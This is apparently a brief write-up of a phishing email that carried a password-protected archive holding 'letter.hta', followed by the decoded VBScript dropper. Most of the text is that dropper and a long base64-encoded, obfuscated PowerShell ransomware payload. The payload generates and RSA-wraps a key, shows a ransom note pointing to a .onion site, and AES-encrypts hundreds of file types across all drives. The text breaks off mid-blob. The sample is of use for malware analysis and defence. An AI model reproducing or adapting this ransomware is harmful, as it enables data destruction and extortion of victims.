letter.hta – Ransomware

This email was a reply to what seemed to be a completely legitimate email from a client.

The email contained a password-protected .rar file named after the recipient (May have been passed using first & last name in unsuspecting senders contacts list?).

The reply message:

Hi, I attach a scanned copy of the letter to this email.

I am packed the file in the archive. Password for the archive is: 12345

After decompressing the .rar, there was a single file, “letter.hta”. The .hta source consisted of a large chunk of code “VBScript.Encode”ed.

After decoding the source, the result was:

Const SYSTEM32 = &H25

Set oFileSystem = CreateObject("Scripting.FileSystemObject")

Set oShell = CreateObject("Shell.Application")

Set WshShell = CreateObject( "WScript.Shell" )

Set oFolder = oShell.Namespace(SYSTEM32)

Set oFolderItem = oFolder.Self

Set oEncryptScript = oFileSystem.CreateTextFile(WshShell.ExpandEnvironmentStrings("%TMP%") & "\test.txt", True)

oEncryptScript.WriteLine("JE5rYWFIYXNYbVBJU3JtZmpQQkVYWll1WFQ9Ik5rYWFIYXNYbVBJU3JtZmpQQkVYWll1WFQiOyRFcnJvckFjdGlvblByZWZlcmVuY2U9IlNpbGVudGx5Q29udGludWUiOyROa2FhSGFzWG1QSVNybWZqUEJFWFpZdVhUPSJOa2FhSGFzWG1QSVNybWZqUEJFWFpZdVhUIjskWnpGbkNDPSJaekZuQ0MiO2lmKChncHMgLU5hbWUgcG93ZXJzaGVsbCkuY291bnQgLWdlIDIpe2V4aXR9JFp6Rm5DQz0iWnpGbkNDIjskc2FjaXJDR2Zaek1NY0FWQUNhTT0ic2FjaXJDR2Zaek1NY0FWQUNhTSI7JHJlZj1bUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWRXaXRoUGFydGlhbE5hbWUoJ1N5c3RlbS5TZWN1cml0eScpOyRzYWNpckNHZlp6TU1jQVZBQ2FNPSJzYWNpckNHZlp6TU1jQVZBQ2FNIjskZkZieERBTWRNZHFvUXhqbnlWSXRtTz0iZkZieERBTWRNZHFvUXhqbnlWSXRtTyI7QWRkLVR5cGUgLUFzc2VtYmx5IFN5c3RlbS5XZWI7JGZGYnhEQU1kTWRxb1F4am55Vkl0bU89ImZGYnhEQU1kTWRxb1F4am55Vkl0bU8iOyRIWGZPTGRJWVZkR01aRFV3a0dmeHpaT0RjTT0iSFhmT0xkSVlWZEdNWkRVd2tHZnh6Wk9EY00iOyRpZHBhdGg9JGVudjpBUFBEQVRBKyJcIisoZ3dtaSB3aW4zMl9jb21wdXRlcnN5c3RlbSkubW9kZWw7JEhYZk9MZElZVmRHTVpEVXdrR2Z4elpPRGNNPSJIWGZPTGRJWVZkR01aRFV3a0dmeHpaT0RjTSI7JE9jWm5MZXJUaXdvT3JWYXpQS2lMbm1qVVJzanRsPSJPY1puTGVyVGl3b09yVmF6UEtpTG5talVSc2p0bCI7aWYhKFRlc3QtUGF0aCAkaWRwYXRoKXskT2NabkxlclRpd29PclZhelBLaUxubWpVUnNqdGw9Ik9jWm5MZXJUaXdvT3JWYXpQS2lMbm1qVVJzanRsIjskR1JNd0JETHBReWlEQ1dKUnJ1S0E9IkdSTXdCRExwUXlpRENXSlJydUtBIjtleGl0I2VzbGkgZXN0IGZpbGUgdmlob2RpbSBuYWgkR1JNd0JETHBReWlEQ1dKUnJ1S0E9IkdSTXdCRExwUXlpRENXSlJydUtBIjskbk1WZVloYUpjTEFoPSJuTVZlWWhhSmNMQWgiO30kbk1WZVloYUpjTEFoPSJuTVZlWWhhSmNMQWgiOyR2YlFranVBVHJGYkN3VGNUdG5ic3NmemVGcz0idmJRa2p1QVRyRmJDd1RjVHRuYnNzZnplRnMiOyRlaz1bV2ViLlNlY3VyaXR5Lk1lbWJlcnNoaXBdOjpHZW5lcmF0ZVBhc3N3b3JkKDQxLCA0KTskdmJRa2p1QVRyRmJDd1RjVHRuYnNzZnplRnM9InZiUWtqdUFUckZiQ3dUY1R0bmJzc2Z6ZUZzIjskdG1JWk5Uanh1YVNKak1lakpjVlpWdVNsVnlVenk9InRtSVpOVGp4dWFTSmpNZWpKY1ZaVnVTbFZ5VXp5IjskZWs9JGVrKygoZ3dtaSBXaW4zMl9vcGVyYXRpbmdzeXN0ZW0pLlZlcnNpb24pLlN1YnN0cmluZygwLDMpKyIwMDEiKyIwMDEiOyR0bUlaTlRqeHVhU0pqTWVqSmNWWlZ1U2xWeVV6eT0idG1JWk5Uanh1YVNKak1lakpjVlpWdVNsVnlVenkiOyR1U2JDSnY9InVTYkNKdiI7W2J5dGVbXV0kYnl0ZXM9W3N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRCeXRlcygkZWspOyR1U2JDSnY9InVTYkNKdiI7JGdzV1FtUGNKY1JxTlhLRlh1S3drT2F0U1E9ImdzV1FtUGNKY1JxTlhLRlh1S3drT2F0U1EiO1NldC1Db250ZW50IC1QYXRoICRpZHBhdGggLVZhbHVlICRlay5TdWJzdHJpbmcoMjAsMik7JGdzV1FtUGNKY1JxTlhLRlh1S3drT2F0U1E9ImdzV1FtUGNKY1JxTlhLRlh1S3drT2F0U1EiOyRjQUd1YlFMWUFqQnBXbWZ2Y1NYcT0iY0FHdWJRTFlBakJwV21mdmNTWHEiOyRiYXNla2V5PSJCZ0lBQUFDa0FBQlNVMEV4QUFRQUFBRUFBUURUWVVaeVZ4aGg0OFIvMVkvSDVOZEVnaTQ5RElIdEpUWG0rbWNWSG52VXBZaU5FbnhwRmovVUpYVkRnMEYycmZXRnBueXFISjBkYnlqc09Dd01YMGVSeXAyVnhyV0Z6T0hJTTZRcGV2eEdGOWl6WGVOcTcrT3pCdW8xMVYvN0VtdlFCVzJzZnVORU9QN3pkVXcwREZLb0srWDJUYWV3YWtpMUxHWWhwc2hqcWc9PSI7JGNBR3ViUUxZQWpCcFdtZnZjU1hxPSJjQUd1YlFMWUFqQnBXbWZ2Y1NYcSI7JEFCalhJc0hnaHNidnVFU1l4RT0iQUJqWElzSGdoc2J2dUVTWXhFIjskcnNhPU5ldy1PYmplY3QgU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5SU0FDcnlwdG9TZXJ2aWNlUHJvdmlkZXI7JEFCalhJc0hnaHNidnVFU1l4RT0iQUJqWElzSGdoc2J2dUVTWXhFIjskSW5pcXNOd1haYmhkeHN2bj0iSW5pcXNOd1haYmhkeHN2biI7JHJzYS5JbXBvcnRDc3BCbG9iKFtzeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGJhc2VrZXkpKTskSW5pcXNOd1haYmhkeHN2bj0iSW5pcXNOd1haYmhkeHN2biI7JEl4cmpISnJneVVNSWVNPSJJeHJqSEpyZ3lVTUllTSI7JGVuY2tleT1bc3lzdGVtLkNvbnZlcnRdOjpUb0Jhc2U2NFN0cmluZygkcnNhLkVuY3J5cHQoJGJ5dGVzLCAkZmFsc2UpKTskSXhyakhKcmd5VU1JZU09Ikl4cmpISnJneVVNSWVNIjskSmZBa2prakhRd0djZU5DUEttakVSWUFhPSJKZkFramtqSFF3R2NlTkNQS21qRVJZQWEiOyR0ZXh0PSI8c3R5bGU+Ym9keXtiYWNrZ3JvdW5kLWNvbG9yOiMzMEJERUI7fWE6bGlua3tjb2xvcjp3aGl0ZTt9YTp2aXNpdGVke2NvbG9yOndoaXRlO31hOnZpc2l0ZWR7Y29sb3I6d2hpdGU7fTwvc3R5bGU+PGNlbnRlcj5JZiB5b3UgcmVhZCB0aGlzIG1lc3NhZ2UsIGl0IG1lYW5zIHRoYXQgeW91ciBjb21wdXRlciB3YXMgYXR0YWNrZWQgYnkgdmlydXNlcy48YnI+PGJyPkFsbCBvZiB5b3VyIGluZm9ybWF0aW9uIChkb2N1bWVudHMsIGZpbG1zIGFuZCBvdGhlciBmaWxlcykgb24gdGhpcyBjb21wdXRlciB3YXMgZW5jb2RlZCB3aXRoIHRoZSBtb3N0IGNyeXB0b2dyYXBoaWNhbGx5IHNlY3VyZSBhbGdvcnl0aG0gaW4gdGhlIHdvcmxkIFJTQTEwMjQuPGJyPjxicj5JbiBvcmRlciB0byByZXN0b3JlIHlvdXIgZmlsZXMsIGl0IGlzIGVzc2VudGlhbCB0byBkb3dubG9hZCBzcGVjaWFsIGJyb3dzZXIgYW5kIGdvIHRvIHNpdGUgPGI+aHR0cDovL2RlY29kZXJzd2xlenJzYTcub25pb248L2I+PGJyPjxicj5TaXRlcyBpbiAub25pb24gYmFuZCBuZWVkcyB0byB2aXNpdCB1c2luZyBkZWRpY2F0ZWQgYnJvd3NlciwgZm9sbG93IHRoZXNlIGluc3RydWN0aW9ucyBhbmQgZG93bmxvYWQgaXQ6PGJyPjxicj48YnI+PGJyPjEuIEdvIHRvIHBhZ2UgPGEgaHJlZj0naHR0cHM6Ly93d3cudG9ycHJvamVjdC5vcmcvZG93bmxvYWQvZG93bmxvYWQtZWFzeS5odG1sLmVuJyB0YXJnZXQ9J19ibGFuayc+aHR0cHM6Ly93d3cudG9ycHJvamVjdC5vcmcvZG93bmxvYWQvZG93bmxvYWQtZWFzeS5odG1sLmVuPC9hPiBhbmQgZG93bmxvYWQgVE9SIGJyb3dzZXIsIGFuZCBzYXZlIGl0IHNvbWV3aGVyZSwgdGhlbiBkb3VibGUgY2xpY2sgb24gaXQuIENsaWNrIG9uIHRoZSBidXR0b24gbGFiZWxlZCAnLi4uJyAoMSkgYW5kIHNlbGVjdCB3aGVyZSB5b3Ugd2FudCB0byBzYXZlIHRoZSBidW5kbGUgdGhlbiBjbGljayBPSyAoMikuIEF0IGxlYXN0IDgwIE1CIGZyZWUgc3BhY2UgbXVzdCBiZSBhdmFpbGFibGUgaW4gdGhlIGxvY2F0aW9uIHlvdSBzZWxlY3QuIElmIHlvdSB3YW50IHRvIGxlYXZlIHRoZSBidW5kbGUgb24gdGhlIGNvbXB1dGVyLCBzYXZpbmcgaXQgdG8gdGhlIERlc2t0b3AgaXMgYSBnb29kIGNob2ljZS4gPGJyPkNsaWNrIEV4dHJhY3QgKDMpIHRvIGJlZ2luIGV4dHJhY3Rpb24uIFRoaXMgbWF5IHRha2UgYSBmZXcgbWludXRlcyB0byBjb21wbGV0ZS48YnI+PGJyPjxpbWcgc3JjPSdodHRwczovL3d3dy50b3Jwcm9qZWN0Lm9yZy9pbWFnZXMvdGJiLXNjcmVlbnNob3QxLnBuZyc+PC9pbWc+PGJyPjxicj4yLiBPbmNlIGV4dHJhY3Rpb24gaXMgY29tcGxldGUsIG9wZW4gdGhlIGZvbGRlciBUb3IgQnJvd3NlciBmcm9tIHRoZSBsb2NhdGlvbiB5b3Ugc2F2ZWQgdGhlIGJ1bmRsZS4gRG91YmxlIGNsaWNrIG9uIHRoZSBTdGFydCBUb3IgQnJvd3NlciAoNCkgYXBwbGljYXRpb24gKGl0IGNhbGxlZCBTdGFydCBUb3IgQnJvd3Nlci5leGUpPGJyPjxicj48aW1nIHNyYz0naHR0cHM6Ly93d3cudG9ycHJvamVjdC5vcmcvaW1hZ2VzL3RiYi1zY3JlZW5zaG90Mi5wbmcnPjwvaW1nPjxicj48YnI+My4gT25jZSBUb3IgaXMgcmVhZHksIFRvciBCcm93c2VyIHdpbGwgYXV0b21hdGljYWxseSBiZSBvcGVuZWQuIE9ubHkgd2ViIHBhZ2VzIHZpc2l0ZWQgdGhyb3VnaCBUb3IgQnJvd3NlciB3aWxsIGJlIHNlbnQgdmlhIFRvci4gT3RoZXIgd2ViIGJyb3dzZXJzIHN1Y2ggYXMgSW50ZXJuZXQgRXhwbG9yZXIgYXJlIG5vdCBhZmZlY3RlZC4gSWYgeW91IGRpZCBldmVyeXRoaW5nIGNvcnJlY3RseSwgeW91IHdpbGwgc2VlIGluIHRoZSBicm93c2VyIHdpbmRvdzogJ0NvbmdyYXR1bGF0aW9ucy4gWW91ciBicm93c2VyIGlzIGNvbmZpZ3VyZWQgdG8gdXNlIFRvci4nPGJyPjxicj48aW1nIHNyYz0naHR0cHM6Ly93d3cudG9ycHJvamVjdC5vcmcvaW1hZ2VzL3RiYi1zY3JlZW5zaG90My5wbmcnPjwvaW1nPjxicj48YnI+NC4gTm93IGdvIHRvIHdlYnNpdGUgPGI+aHR0cDovL2RlY29kZXJzd2xlenJzYTcub25pb248L2I+IGluIHRvciBicm93c2VyIGFuZCBmb2xsb3cgdGhlIGluc3RydWN0aW9ucy48YnI+PGJyPllvdXIgcGVyc29uYWwgSUQ6IDxpbnB1dCB2YWx1ZT0nIiskZW5ja2V5KyInPjwvY2VudGVyPiI7JEpmQWtqa2pIUXdHY2VOQ1BLbWpFUllBYT0iSmZBa2prakhRd0djZU5DUEttakVSWUFhIjskd2VOQ1pPZVpPZGlYR1VETW1qZnhZeklsYT0id2VOQ1pPZVpPZGlYR1VETW1qZnhZeklsYSI7ZnVuY3Rpb24gRW5jcnlwdC1GaWxlKCRpdGVtLCAkUGFzc3BocmFzZSl7JHdlTkNaT2VaT2RpWEdVRE1tamZ4WXpJbGE9IndlTkNaT2VaT2RpWEdVRE1tamZ4WXpJbGEiOyRIY3N4eGFVTkVCaFZ6SE95WGFqaVJtPSJIY3N4eGFVTkVCaFZ6SE95WGFqaVJtIjskc2FsdD0iRklMRUJMT0NLRUQgc2NyeXB0IjskSGNzeHhhVU5FQmhWekhPeVhhamlSbT0iSGNzeHhhVU5FQmhWekhPeVhhamlSbSI7JExpRHlHREFEaWpGYXlIdz0iTGlEeUdEQURpakZheUh3IjskaW5pdD0iRklMRUJMT0NLRUQgSU5JVCI7JExpRHlHREFEaWpGYXlIdz0iTGlEeUdEQURpakZheUh3IjskTW1BemFFbktYaUd0WmxyVmN1cHFxaD0iTW1BemFFbktYaUd0WmxyVmN1cHFxaCI7JHI9bmV3LU9iamVjdCBTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlJpam5kYWVsTWFuYWdlZDskTW1BemFFbktYaUd0WmxyVmN1cHFxaD0iTW1BemFFbktYaUd0WmxyVmN1cHFxaCI7JE9pRFJhdm9Zd2pTSURwb3BkRWRlVWF0PSJPaURSYXZvWXdqU0lEcG9wZEVkZVVhdCI7JHBhc3M9W1RleHQuRW5jb2RpbmddOjpVVEY4LkdldEJ5dGVzKCRQYXNzcGhyYXNlKTskT2lEUmF2b1l3alNJRHBvcGRFZGVVYXQ9Ik9pRFJhdm9Zd2pTSURwb3BkRWRlVWF0Ijskb0FWY2lRa3JTR289Im9BVmNpUWtyU0dvIjskc2FsdD1bVGV4dC5FbmNvZGluZ106OlVURjguR2V0Qnl0ZXMoJHNhbHQpOyRvQVZjaVFrclNHbz0ib0FWY2lRa3JTR28iOyR1WWVSZ2pWeHVrRWlwQU5PRmpzPSJ1WWVSZ2pWeHVrRWlwQU5PRmpzIjskci5LZXk9KG5ldy1PYmplY3QgU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhc3N3b3JkRGVyaXZlQnl0ZXMgJHBhc3MsICRzYWx0LCAiU0hBMSIsIDUpLkdldEJ5dGVzKDMyKTskdVllUmdqVnh1a0VpcEFOT0Zqcz0idVllUmdqVnh1a0VpcEFOT0ZqcyI7JGd0cG1jZHpnYUtEd089Imd0cG1jZHpnYUtEd08iOyRyLklWPShuZXctT2JqZWN0IFNlY3VyaXR5LkNyeXB0b2dyYXBoeS5TSEExTWFuYWdlZCkuQ29tcHV0ZUhhc2goW1RleHQuRW5jb2RpbmddOjpVVEY4LkdldEJ5dGVzKCRpbml0KSlbMC4uMTVdOyRndHBtY2R6Z2FLRHdPPSJndHBtY2R6Z2FLRHdPIjskVG9vWXJuTWN6Vm9zdkFQZz0iVG9vWXJuTWN6Vm9zdkFQZyI7JHIuUGFkZGluZz0iWmVyb3MiOyRUb29Zcm5NY3pWb3N2QVBnPSJUb29Zcm5NY3pWb3N2QVBnIjskdlFiUFdlQVhZSldPbmtEc1hBRWN1SFdaa0JzQT0idlFiUFdlQVhZSldPbmtEc1hBRWN1SFdaa0JzQSI7JHIuTW9kZT0iQ0JDIjskdlFiUFdlQVhZSldPbmtEc1hBRWN1SFdaa0JzQT0idlFiUFdlQVhZSldPbmtEc1hBRWN1SFdaa0JzQSI7JEFRaVJIVFJWenlrQ2hoZkhyc2dFSFVPWkN3eD0iQVFpUkhUUlZ6eWtDaGhmSHJzZ0VIVU9aQ3d4IjskYz0kci5DcmVhdGVFbmNyeXB0b3IoKTskQVFpUkhUUlZ6eWtDaGhmSHJzZ0VIVU9aQ3d4PSJBUWlSSFRSVnp5a0NoaGZIcnNnRUhVT1pDd3giOyRyR09kb3l5PSJyR09kb3l5IjskbXM9bmV3LU9iamVjdCBJTy5NZW1vcnlTdHJlYW07JHJHT2RveXk9InJHT2RveXkiOyRKemtodFh5ZWFkWUhXWG1SRG89Ikp6a2h0WHllYWRZSFdYbVJEbyI7JGNzPW5ldy1PYmplY3QgU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LkNyeXB0b1N0cmVhbSAkbXMsJGMsIldyaXRlIjskSnpraHRYeWVhZFlIV1htUkRvPSJKemtodFh5ZWFkWUhXWG1SRG8iOyR4aUVDcVVqYVJVdnlYR0ZOZnpYdkRob2lHakw9InhpRUNxVWphUlV2eVhHRk5melh2RGhvaUdqTCI7JGNzLldyaXRlKCRpdGVtLCAwLCRpdGVtLkxlbmd0aCk7JHhpRUNxVWphUlV2eVhHRk5melh2RGhvaUdqTD0ieGlFQ3FVamFSVXZ5WEdGTmZ6WHZEaG9pR2pMIjskVmhxZXZnRGFseGR5YWRuaT0iVmhxZXZnRGFseGR5YWRuaSI7JGNzLkNsb3NlKCk7JFZocWV2Z0RhbHhkeWFkbmk9IlZocWV2Z0RhbHhkeWFkbmkiOyRDSXZtanZqZmRheEpRc2laPSJDSXZtanZqZmRheEpRc2laIjskbXMuQ2xvc2UoKTskQ0l2bWp2amZkYXhKUXNpWj0iQ0l2bWp2amZkYXhKUXNpWiI7JEFtR3Zub01RemF5dE1lbE5kb2ZHPSJBbUd2bm9NUXpheXRNZWxOZG9mRyI7JHIuQ2xlYXIoKTskQW1Hdm5vTVF6YXl0TWVsTmRvZkc9IkFtR3Zub01RemF5dE1lbE5kb2ZHIjskVlZTZVBSbnp6RUVRWmx0PSJWVlNlUFJuenpFRVFabHQiO3JldHVybiAkbXMuVG9BcnJheSgpOyRWVlNlUFJuenpFRVFabHQ9IlZWU2VQUm56ekVFUVpsdCI7JHdXZXBJRWRjS0RLU2c9IndXZXBJRWRjS0RLU2ciO30kd1dlcElFZGNLREtTZz0id1dlcElFZGNLREtTZyI7JE55dE9RUmpGWHpua2VBej0iTnl0T1FSakZYem5rZUF6IjskZGlza3M9Z2RyfHdoZXJleyRfLkZyZWUgLWd0IDUwMDAwfXxzb3J0IC1EZXNjZW5kaW5nOyROeXRPUVJqRlh6bmtlQXo9Ik55dE9RUmpGWHpua2VBeiI7JE1ISW1HSUJMWEtPRmJpWnhBQ0NNPSJNSEltR0lCTFhLT0ZiaVp4QUNDTSI7Zm9yZWFjaCgkZGlzayBpbiAkZGlza3MpeyRNSEltR0lCTFhLT0ZiaVp4QUNDTT0iTUhJbUdJQkxYS09GYmlaeEFDQ00iOyRDSmJXZWZqUldCUG9KUk54PSJDSmJXZWZqUldCUG9KUk54IjtnY2kgJGRpc2sucm9vdCAtUmVjdXJzZSAtSW5jbHVkZSAiKi5kb2MiLCIqLnhscyIsIiouZG9jeCIsIioueGxzeCIsIiouZGIiLCIqLm1wMyIsIioud2F3IiwiKi5qcGciLCIqLmpwZWciLCIqLnR4dCIsIioucnRmIiwiKi5wZGYiLCIqLnJhciIsIiouemlwIiwiKi5wc2QiLCIqLm1zaSIsIioudGlmIiwiKi53bWEiLCIqLmxuayIsIiouZ2lmIiwiKi5ibXAiLCIqLnBwdCIsIioucHB0eCIsIiouZG9jbSIsIioueGxzbSIsIioucHBzIiwiKi5wcHN4IiwiKi5wcGQiLCIqLnRpZmYiLCIqLmVwcyIsIioucG5nIiwiKi5hY2UiLCIqLmRqdnUiLCIqLnhtbCIsIiouY2RyIiwiKi5tYXgiLCIqLndtdiIsIiouYXZpIiwiKi53YXYiLCIqLm1wNCIsIioucGRkIiwiKi5odG1sIiwiKi5jc3MiLCIqLnBocCIsIiouYWFjIiwiKi5hYzMiLCIqLmFtZiIsIiouYW1yIiwiKi5taWQiLCIqLm1pZGkiLCIqLm1tZiIsIioubW9kIiwiKi5tcDEiLCIqLm1wYSIsIioubXBnYSIsIioubXB1IiwiKi5ucnQiLCIqLm9nYSIsIioub2dnIiwiKi5wYmYiLCIqLnJhIiwiKi5yYW0iLCIqLnJhdyIsIiouc2FmIiwiKi52YWwiLCIqLndhdmUiLCIqLndvdyIsIioud3BrIiwiKi4zZzIiLCIqLjNncCIsIiouM2dwMiIsIiouM21tIiwiKi5hbXgiLCIqLmF2cyIsIiouYmlrIiwiKi5iaW4iLCIqLmRpciIsIiouZGl2eCIsIiouZHZ4IiwiKi5ldm8iLCIqLmZsdiIsIioucXRxIiwiKi50Y2giLCIqLnJ0cyIsIioucnVtIiwiKi5ydiIsIiouc2NuIiwiKi5zcnQiLCIqLnN0eCIsIiouc3ZpIiwiKi5zd2YiLCIqLnRycCIsIioudmRvIiwiKi53bSIsIioud21kIiwiKi53bW1wIiwiKi53bXgiLCIqLnd2eCIsIioueHZpZCIsIiouM2QiLCIqLjNkNCIsIiouM2RmOCIsIioucGJzIiwiKi5hZGkiLCIqLmFpcyIsIiouYW11IiwiKi5hcnIiLCIqLmJtYyIsIiouYm1mIiwiKi5jYWciLCIqLmNhbSIsIiouZG5nIiwiKi5pbmsiLCIqLmppZiIsIiouamlmZiIsIiouanBjIiwiKi5qcGYiLCIqLmpwdyIsIioubWFnIiwiKi5taWMiLCIqLm1pcCIsIioubXNwIiwiKi5uYXYiLCIqLm5jZCIsIioub2RjIiwiKi5vZGkiLCIqLm9wZiIsIioucWlmIiwiKi5xdGlxIiwiKi5zcmYiLCIqLnh3ZCIsIiouYWJ3IiwiKi5hY3QiLCIqLmFkdCIsIiouYWltIiwiKi5hbnMiLCIqLmFzYyIsIiouYXNlIiwiKi5iZHAiLCIqLmJkciIsIiouYmliIiwiKi5ib2MiLCIqLmNyZCIsIiouZGl6IiwiKi5kb3QiLCIqLmRvdG0iLCIqLmRvdHgiLCIqLmR2aSIsIiouZHhlIiwiKi5tbHgiLCIqLmVyciIsIiouZXVjIiwiKi5mYXEiLCIqLmZkciIsIiouZmRzIiwiKi5ndGhyIiwiKi5pZHgiLCIqLmt3ZCIsIioubHAyIiwiKi5sdHIiLCIqLm1hbiIsIioubWJveCIsIioubXNnIiwiKi5uZm8iLCIqLm5vdyIsIioub2RtIiwiKi5vZnQiLCIqLnB3aSIsIioucm5nIiwiKi5ydHgiLCIqLnJ1biIsIiouc3NhIiwiKi50ZXh0IiwiKi51bngiLCIqLndiayIsIioud3NoIiwiKi43eiIsIiouYXJjIiwiKi5hcmkiLCIqLmFyaiIsIiouY2FyIiwiKi5jYnIiLCIqLmNieiIsIiouZ3oiLCIqLmd6aWciLCIqLmpneiIsIioucGFrIiwiKi5wY3YiLCIqLnB1eiIsIioucjAwIiwiKi5yMDEiLCIqLnIwMiIsIioucjAzIiwiKi5yZXYiLCIqLnNkbiIsIiouc2VuIiwiKi5zZnMiLCIqLnNmeCIsIiouc2giLCIqLnNoYXIiLCIqLnNociIsIiouc3F4IiwiKi50YnoyIiwiKi50ZyIsIioudGx6IiwiKi52c2kiLCIqLndhZCIsIioud2FyIiwiKi54cGkiLCIqLnowMiIsIiouejA0IiwiKi56YXAiLCIqLnppcHgiLCIqLnpvbyIsIiouaXBhIiwiKi5pc3UiLCIqLmphciIsIiouanMiLCIqLnVkZiIsIiouYWRyIiwiKi5hcCIsIiouYXJvIiwiKi5hc2EiLCIqLmFzY3giLCIqLmFzaHgiLCIqLmFzbXgiLCIqLmFzcCIsIiouYXNweCIsIiouYXNyIiwiKi5hdG9tIiwiKi5ibWwiLCIqLmNlciIsIiouY21zIiwiKi5jcnQiLCIqLmRhcCIsIiouaHRtIiwiKi5tb3oiLCIqLnN2ciIsIioudXJsIiwiKi53ZGd0IiwiKi5hYmsiLCIqLmJpYyIsIiouYmlnIiwiKi5ibHAiLCIqLmJzcCIsIiouY2dmIiwiKi5jaGsiLCIqLmNvbCIsIiouY3R5IiwiKi5kZW0iLCIqLmVsZiIsIiouZmYiLCIqLmdhbSIsIiouZ3JmIiwiKi5oM20iLCIqLmg0ciIsIiouaXdkIiwiKi5sZGIiLCIqLmxncCIsIioubHZsIiwiKi5tYXAiLCIqLm1kMyIsIioubWRsIiwiKi5tbTYiLCIqLm1tNyIsIioubW04IiwiKi5uZHMiLCIqLnBicCIsIioucHBmIiwiKi5wd2YiLCIqLnB4cCIsIiouc2FkIiwiKi5zYXYiLCIqLnNjbSIsIiouc2N4IiwiKi5zZHQiLCIqLnNwciIsIiouc3VkIiwiKi51YXgiLCIqLnVteCIsIioudW5yIiwiKi51b3AiLCIqLnVzYSIsIioudXN4IiwiKi51dDIiLCIqLnV0MyIsIioudXRjIiwiKi51dHgiLCIqLnV2eCIsIioudXh4IiwiKi52bWYiLCIqLnZ0ZiIsIioudzNnIiwiKi53M3giLCIqLnd0ZCIsIioud3RmIiwiKi5jY2QiLCIqLmNkIiwiKi5jc28iLCIqLmRpc2siLCIqLmRtZyIsIiouZHZkIiwiKi5mY2QiLCIqLmZscCIsIiouaW1nIiwiKi5pc28iLCIqLmlzeiIsIioubWQwIiwiKi5tZDEiLCIqLm1kMiIsIioubWRmIiwiKi5tZHMiLCIqLm5yZyIsIioubnJpIiwiKi52Y2QiLCIqLnZoZCIsIiouc25wIiwiKi5ia2YiLCIqLmFkZSIsIiouYWRwYiIsIiouZGljIiwiKi5jY2giLCIqLmN0dCIsIiouZGFsIiwiKi5kZGMiLCIqLmRkY3giLCIqLmRleCIsIiouZGlmIiwiKi5kaWkiLCIqLml0ZGIiLCIqLml0bCIsIioua216IiwiKi5sY2QiLCIqLmxjZiIsIioubWJ4IiwiKi5tZG4iLCIqLm9kZiIsIioub2RwIiwiKi5vZHMiLCIqLnBhYiIsIioucGtiIiwiKi5wa2giLCIqLnBvdCIsIioucG90eCIsIioucHB0bSIsIioucHNhIiwiKi5xZGYiLCIqLnFlbCIsIioucmduIiwiKi5ycnQiLCIqLnJzdyIsIioucnRlIiwiKi5zZGIiLCIqLnNkYyIsIiouc2RzIiwiKi5zcWwiLCIqLnN0dCIsIioudDAxIiwiKi50MDMiLCIqLnQwNSIsIioudGN4IiwiKi50aG14IiwiKi50eGQiLCIqLnR4ZiIsIioudXBvaSIsIioudm10IiwiKi53a3MiLCIqLndtZGIiLCIqLnhsIiwiKi54bGMiLCIqLnhsciIsIioueGxzYiIsIioueGx0eCIsIioubHRtIiwiKi54bHd4IiwiKi5tY2QiLCIqLmNhcCIsIiouY2MiLCIqLmNvZCIsIiouY3AiLCIqLmNwcCIsIiouY3MiLCIqLmNzaSIsIiouZGNwIiwiKi5kY3UiLCIqLmRldiIsIiouZG9iIiwiKi5kb3giLCIqLmRwayIsIiouZHBsIiwiKi5kcHIiLCIqLmRzayIsIiouZHNwIiwiKi5lcWwiLCIqLmV4IiwiKi5mOTAiLCIqLmZsYSIsIiouZm9yIiwiKi5mcHAiLCIqLmphdiIsIiouamF2YSIsIioubGJpIiwiKi5vd2wiLCIqLnBsIiwiKi5wbGMiLCIqLnBsaSIsIioucG0iLCIqLnJlcyIsIioucm5jIiwiKi5yc3JjIiwiKi5zbyIsIiouc3dkIiwiKi50cHUiLCIqLnRweCIsIioudHUiLCIqLnR1ciIsIioudmMiLCIqLnlhYiIsIiouOGJhIiwiKi44YmMiLCIqLjhiZSIsIiouOGJmIiwiKi44Ymk4IiwiKi5iaTgiLCIqLjhibCIsIiouOGJzIiwiKi44YngiLCIqLjhieSIsIiouOGxpIiwiKi5haXAiLCIqLmFteHgiLCIqLmFwZSIsIiouYXBpIiwiKi5teHAiLCIqLm94dCIsIioucXB4IiwiKi5xdHIiLCIqLnhsYSIsIioueGxhbSIsIioueGxsIiwiKi54bHYiLCIqLnhwdCIsIiouY2ZnIiwiKi5jd2YiLCIqLmRiYiIsIiouc2x0IiwiKi5icDIiLCIqLmJwMyIsIiouYnBsIiwiKi5jbHIiLCIqLmRieCIsIiouamMiLCIqLnBvdG0iLCIqLnBwc20iLCIqLnByYyIsIioucHJ0IiwiKi5zaHciLCIqLnN0ZCIsIioudmVyIiwiKi53cGwiLCIqLnhsbSIsIioueXBzIiwiKi5tZDMiLCIqLjFjZCJ8JXskQ0piV2VmalJXQlBvSlJOeD0iQ0piV2VmalJXQlBvSlJOeCI7JEtWTERMUXRZemRsaG1uS0RiWUFRRFU9IktWTERMUXRZemRsaG1uS0RiWUFRRFUiO3RyeXskS1ZMRExRdFl6ZGxobW5LRGJZQVFEVT0iS1ZMRExRdFl6ZGxobW5LRGJZQVFEVSI7JFBNaWFYY0llbldjUlZhUGpBeUFXdUNWPSJQTWlhWGNJZW5XY1JWYVBqQXlBV3VDViI7JGZpbGU9W2lvLmZpbGVdOjpPcGVuKCRfLCAnT3BlbicsICdSZWFkV3JpdGUnKTskUE1pYVhjSWVuV2NSVmFQakF5QVd1Q1Y9IlBNaWFYY0llbldjUlZhUGpBeUFXdUNWIjskY2hxbmZFRHlOYXZRZU49ImNocW5mRUR5TmF2UWVOIjtpZigkZmlsZS5MZW5ndGggLWx0ICI0MDk2MCIpeyRzaXplPSRmaWxlLkxlbmd0aH1lbHNleyRzaXplPSI0MDk2MCJ9JGNocW5mRUR5TmF2UWVOPSJjaHFuZkVEeU5hdlFlTiI7JHZJVHNMVEVQQUxsT1E9InZJVHNMVEVQQUxsT1EiO1tieXRlW11dJGJ1ZmYgPSBuZXctb2JqZWN0IGJ5dGVbXSAkc2l6ZTskdklUc0xURVBBTGxPUT0idklUc0xURVBBTGxPUSI7JGFxZUZnQmxoYWdQY1pCb01